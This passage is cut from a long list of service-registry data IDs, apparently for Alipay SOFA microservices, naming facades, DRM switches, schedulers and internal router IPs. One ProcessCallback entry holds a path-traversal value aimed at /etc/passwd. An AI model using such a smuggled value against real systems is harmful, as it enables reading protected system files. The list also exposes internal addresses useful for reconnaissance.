AssetConsultService:1.0:paydecision3Tmarkting@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.strategy.ChangeBlackListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_ALI_rate_portal_message_topic#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.antPlatformPolicyBuyOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.irecon.common.service.query.fund.api.QueryAccItemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.17.0.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pucprod.common.service.facade.jiaofei.QueryChargeOutInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.close.CloseUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.153.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mychain.defin.insurance.facade.InPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.228.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-secucommunity-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:whiteListApplyApproval_CallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.application:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.apyunqing.facade.AppApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cifcommon.uniquery.facade.UniQueryCacheSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_MEMBER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininsightcore.common.service.facade.decision.api.DecisionMakerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.service.ProdtransRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.LocalCacheUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.dynamicview.DisplayRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-alipaymember-schedule-lejin#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileha.core.service.secretary.WorkAssistantProjectInstanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insassetprod.common.service.facade.PolicySearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.LabelQueryBackendQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.minitrans.service.facade.common.operate.api.DailycutOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordercore.product.common.service.api.PdConfigSyncOfflineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchmembercore.common.facade.MemberProductDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finannafccore.common.service.facade.news.api.FundRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antbank.robot.helper.facade.HelpRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.TemplateInstanceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gauss.recmng.common.service.facade.api.ColumnManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksettlemng_repayment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.InspectFailureManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.linkcard.LinkCardDataHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArCollectReceiptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:isasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.123.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.fop.api.mng.FileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.ThreadPoolConfig.corePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finprodcenter.common.service.facade.ProductBizRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promocenter.facade.api.prototype.ActivityQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.fcrcportal:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.biz.facade.api.AppRiskInspectServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:virtualprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.suiteide.common.service.facade.api.SuiteTemplateVariableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.common.service.facade.LabelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.catalog.CatalogMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ROUTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecashier.service.facade.spi.CashierActivityCallbackFacade:1.0:pucprod_result_callback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_BAOXIAN_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dk.common.service.facade.open.api.rule.DkDqmUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.comon.service.facade.RateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.promo.service.CampRefuelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cachecore.drm.GeneralCacheSwitch.chargetbasecache.cacheHitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.vccUpVoucherType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.admin.RrpcConfigAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.profitRateCacheHour,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.core.service.censor.SheetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.benetnasch.facade.api.ChangeEffectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_foreign_cust_info@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pricecenter.common.service.facade.api.template.TemplateConditionGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.datacatalog.common.facade.spi.DataCatalogUpgradeSpi:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.SeqManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antlogmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.biz.tsure.facade.TsureDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_PRE_PROCESS_THIRD_PHASE_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vein.winbillboard.common.service.facade.hook.BlueInject:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:hitutwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.template.TemplateMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.123.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.accountNoSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csaccurate.service.facade.mng.api.RuleSetQueryService:1.0:csaccurate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.service.facade.FundCorrectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discountcore.common.service.facade.DiscountTicketService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacctrans.service.facade.api.DailyCutService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.activity.NewbieChannelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_RISK_RESULT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.budgetcore.common.service.facade.control.BudgetControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.CodeAttackNotifyFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cryptlib.facade.KmiSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_PRE_TRANSFER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.AccItemSendDrm.taskModeSleepTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.biz.appointment.LotteryAppointmentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.biz.lfc.rpc.LifeCircleFeedService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.amct.facade.DeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.forceSetInventoryCloseThresholdByRybCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketmng.common.service.facade.api.manage.ApiCipherManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:unifygw@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksettlemng_enterAccount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.biz.antsearch.AntSearch4DsglService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.DiscountRecordQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcservicebus.client.BusClientInvoker:1.0:rcswitchbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.echox.drm.EchoxSpecialDrm.cleanMockCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:stocksupervise@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmaterialcenter.common.service.facade.api.material.MaterialFeatureManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.crowd.CrowdFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingcore.common.service.facade.InsSaleActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:mount_alias_not_proxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.biz.accountorder.receipt.service.AccOrderReceivePayAckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.core.service.quote.remind.StockQuoteRemindWorkerThread:1.0:testStockQuoteRemindWorkerThread@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_fixed_investment_daemon.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.iad.facade.channel.ChannelInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.content.FansContentPushQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.SpiCreatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.v2.AutoAgencyFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FundConvertConfigRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.report.EnterpriseWithdrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sandboxhome:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.template.VcpVoucherTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apopscompose.common.service.facade.processinstance.ProcessInstanceParamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.common.BizLookupsExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:approveFactoringTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.spi.RecommendFacade:1.0:mdeduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:trafficcardsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorRelIpRoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.168.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finbatch:name=com.alipay.masterdata.uniform.whitelist.drm.resource.values,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dwmdps.common.service.KpiInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.nozone.NoZoneRouteRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.entrance.EntranceCodeQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.FincomeSnapshotMsgPublishSwitchDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.OpenDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:linglongmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCardRuleServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:caprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oasis.common.service.facade.cluster.manager.ForEnclaveTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.facade.api.query.ExchangeRateQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsAutoTransferInRecordListQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumecenter.common.service.facade.RecoverEventQueryFacade:1.0:oversea_receipt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.query.AccountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.income.common.service.facade.BillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:cancelSignContractNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.share.partner.InstWithdrawConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:yebguardianSpecialQuota@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.PassiveClearingWipeSettleAccountDRM.targetCodeJsonArrayStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.65.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.accenter.service.facade.api.AccenterAccountingMsgManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dmirror@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_EC-pcreditbatch-SendClearingMessage_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secucommunity.common.service.facade.contentsync.ContentSyncServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:applyCloseAccount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igfas.facade.api.MerchantPrepaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainabsprod.common.facade.api.ccl.spv.AbsSPVService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.SecuIndicatorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.117.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbprod.common.service.facade.product.service.ProductExpectGrowthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscvprod.common.service.facade.InsClaimTraceScriptFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.wishTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.orderlink.RewardOrderLinkQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ufe.internal.facade.service.UfeRepoPublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.ruleConfigs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfoprod.common.service.cds.facade.ProductSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iotDeviceRecycle_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.76.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:unattended@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.ReservedParamManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecommunity.common.service.facade.CommunityPunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.rest.DialogManagerRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilebc.common.service.facade.component.spi.common.ComponentMeteDataConsultCallbackFacade:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_INTCLCN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antdsm.core.service.drm.DrmManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:antsecurity_ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.faasset.api.asset.FaAssetTransApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.124.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.decisionx.engine.common.api.ResourceStatusService:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmembercenter.common.service.facade.member.api.MemberSourceMamageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.239.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antaid.common.service.facade.api.AntaidAlarmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.amcs.WhitelistService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.promo.service.MallPromoteRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetcenter.common.service.facade.api.oper.ast.AssetRiskManagerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.spi.lottery.LotteryAccessFacade:1.0:mrchportalcore_antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autobizcore.common.fundamental.datafacade.VarFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spannermng.common.service.facade.BatchTrafficSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.daemon.event.drm.BankCardAsyncCompensateDrmResource.commmonGroupSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.sendCardMessage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cschannel.common.service.facade.api.ServiceLogoService:1.0.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.InstProtocolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.paramTaskIC,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antopo.common.service.facade.biz.merchant.MerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-SOCIALCORE-SCHEDULE-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S_fcarcore_schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promox.facade.crowd.CrowdAnalysisFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdispute.facade.api.DisputeSubmitLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.report.RefundReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gauss.recmng.common.service.facade.api.SceneManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.upgrade.UpgradeTo32bVersionOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ProcessActionFacade:1.0@DEFAULT#@#DE